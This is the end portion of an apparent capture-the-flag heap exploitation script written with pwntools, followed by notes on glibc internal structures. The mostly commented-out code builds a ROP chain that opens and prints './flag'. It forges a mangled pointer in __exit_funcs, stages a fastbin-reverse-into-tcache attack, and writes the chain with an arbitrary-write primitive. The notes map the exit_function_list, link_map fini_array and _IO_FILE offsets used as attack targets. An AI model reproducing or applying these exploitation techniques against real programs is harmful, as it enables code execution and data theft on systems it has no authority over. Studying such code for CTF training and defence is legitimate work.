#     pop_rdx = libc_base + 0x00000000000c7f32 # pop rdx ; ret
#     func_cnt = 3
#     args_cnt = 2 + 3 + 1
#     payload = ""
#     payload += flat([pop_rdi, orwchain_base + func_cnt * 8 + args_cnt * 0x10, pop_rsi, 0, libc_base + libc.sym['open']])
#     payload += flat([pop_rdi, 3, pop_rsi, orwchain_base + 0x100, pop_rdx, 0x40, libc_base + libc.sym['read']])
#     payload += flat([pop_rdi, orwchain_base + 0x100, libc_base + libc.sym['puts']])
#     payload += "./flag"
#     return payload

# rdi2rdx = libc_base + 0x000000000014a0a0 # mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
# rdx2rsp = libc_base + 0x0000000000059020 # mov rsp, rdx ; ret
# add_rsp_0x28 = libc_base + 0x0000000000044ce5 # add rsp, 0x28 ; ret

# ropchain_addr = heap_base + 0xA00
# ropchain = flat([add_rsp_0x28, ropchain_addr, 0, 0, rdx2rsp])
# ropchain += p64(0) # padding
# ropchain += orw_payload(libc_base, ropchain_addr + 0x30)

# for i in range((len(ropchain) + 8) // 0x10):
#     arbitrary_write(ropchain_addr + i*0x10, ropchain[i*0x10:(i+1)*0x10])

# # forge __exit_function
# edit(0, "\x00") # "clear" the tcache bin
# arbitrary_write(heap_base + 0x10, p64(0) + p64(1)) # exit_function_list->next = NULL, exit_function_list->idx = 1
# encoded_rdi2rdx = rdi2rdx ^ __pointer_chk
# encoded_rdi2rdx = ((encoded_rdi2rdx << 17) & ((1 << 64) - 1)) | (encoded_rdi2rdx >> (64 - 17))
# arbitrary_write(heap_base + 0x20, p64(4) + p64(encoded_rdi2rdx)) # exit_function_list->fns[0].flavor = ef_cxa(0x4), exit_function_list->fns[0].cxa.fn = rdi2rdx
# arbitrary_write(heap_base + 0x30, p64(ropchain_addr)) # exit_function_list->fns[0].cxa.arg = ropchain_addr

# # prepare fastbin
# add(1)
# for i in range(5):
#     add(2)
#     edit(2, p64((heap_base + 0x3f0 + 0x20 * i) ^ (heap_base >> 12)))
# add(2)
# edit(2, p64((libc_base + 0x1E0738 - 0x18) ^ (heap_base >> 12))) # __exit_funcs
# edit(0, "\x07") # "fill" the tcache bin
# delete(1) # put into fastbin
# edit(1, p64((heap_base + 0x3d0) ^ (heap_base >> 12))) # prepare for fastbin reverse into tcache attack

# # fastbin reverse into tcache attack, this will change __exit_funcs
# edit(0, "\x00") # "clear" the tcache bin
# add(1)

# # clear fastbin
# edit(0, "\x07")
# delete(1)
# edit(1, p64(heap_base >> 12))
# edit(0, "\x00")
# add(1)

# # trigger exit
# delete(1)
# edit(0, "\x02")
# edit(1, p64((heap_base + 0x2000) ^ (heap_base >> 12)))
# add(1)
# add(2)
# ##################################### 

success("libc_base: " + hex(libc_base))
success("heap_base: " + hex(heap_base))

p.interactive()

'''
_exit_funcs (struct exit_functions_list **):

struct exit_function_list
{
    struct exit_function_list *next;
    size_t idx;
    struct exit_function fns[32];
};

struct exit_function
{
    /* `flavour' should be of type of the `enum' above but since we need
       this element in an atomic operation we have to use `long int'.  */
    long int flavor;
    union
    {
        void (*at) (void);
        struct
        {
            void (*fn) (int status, void *arg);
            void *arg;
        } on;
        struct
        {
            void (*fn) (void *arg, int status);
            void *arg;
            void *dso_handle;
        } cxa;
    } func;
};
'''

'''
_rtld_global->_dl_ns[0]->_ns_loaded: (link map) 
offset           member
0x0              l_addr         (point to program base by default)
0x18             l_next         (point to next link map, the length of the linked list should be no smaller than 4, and the tial nodes's l_next = 0)
0x20             l_prev         (point to previous link map, head node's l_prev = 0)
0x110            l_info[0x1A]   (
                                    point to fini_array Elf64_Dyn structure:
                                    typedef struct
                                    {
                                    Elf64_Sxword	d_tag;			/* Dynamic entry type */
                                    union
                                        {
                                            Elf64_Xword d_val;		/* Integer value */             
                                            Elf64_Addr d_ptr;	    /* Address value */       
                                                                    // l_info[0x1A]->d_un.d_ptr + l_addr = &fini_array
                                        } d_un;
                                    } Elf64_Dyn;)
                                )
0x120            l_info[0x1C]   (point to fini_array_size Elf64_Dyn structure)        //  l_info[0x1C]->d_un.d_val= sizeof(fini_array)
'''


'''
struct _IO_FILE
{
  int _flags;		/* High-order word is _IO_MAGIC; rest is flags. */              0x10

  /* The following pointers correspond to the C++ streambuf protocol. */
  char *_IO_read_ptr;	/* Current read pointer */                                  0x18
  char *_IO_read_end;	/* End of get area. */                                      0x20
  char *_IO_read_base;	/* Start of putback+get area. */                            0x28
  char *_IO_write_base;	/* Start of put area. */                                    0x30
  char *_IO_write_ptr;	/* Current put pointer. */                                  0x38
  char *_IO_write_end;	/* End of put area. */                                      0x40
  char *_IO_buf_base;	/* Start of reserve area. */                                0x48
  char *_IO_buf_end;	/* End of reserve area. */                                  0x50

  /* The following fields are used to support backing up and undo. */
  char *_IO_save_base; /* Pointer to start of non-current get area. */              0x58
  char *_IO_backup_base;  /* Pointer to first valid character of backup area */     0x60
  char *_IO_save_end; /* Pointer to end of non-current get area. */                 0x68

  struct _IO_marker *_markers;                                                      0x70

  struct _IO_FILE *_chain;                                                          0x78

  int _fileno;                                                                      0x80
  int _flags2;                                                                      0x84
  __off_t _old_offset; /* This used to be _offset but it's too small.  */           

  /* 1+column number of pbase(); 0 is unknown. */
  unsigned short _cur_column;
  signed char _vtable_offset;
  char _shortbuf[1];

  _IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};
'''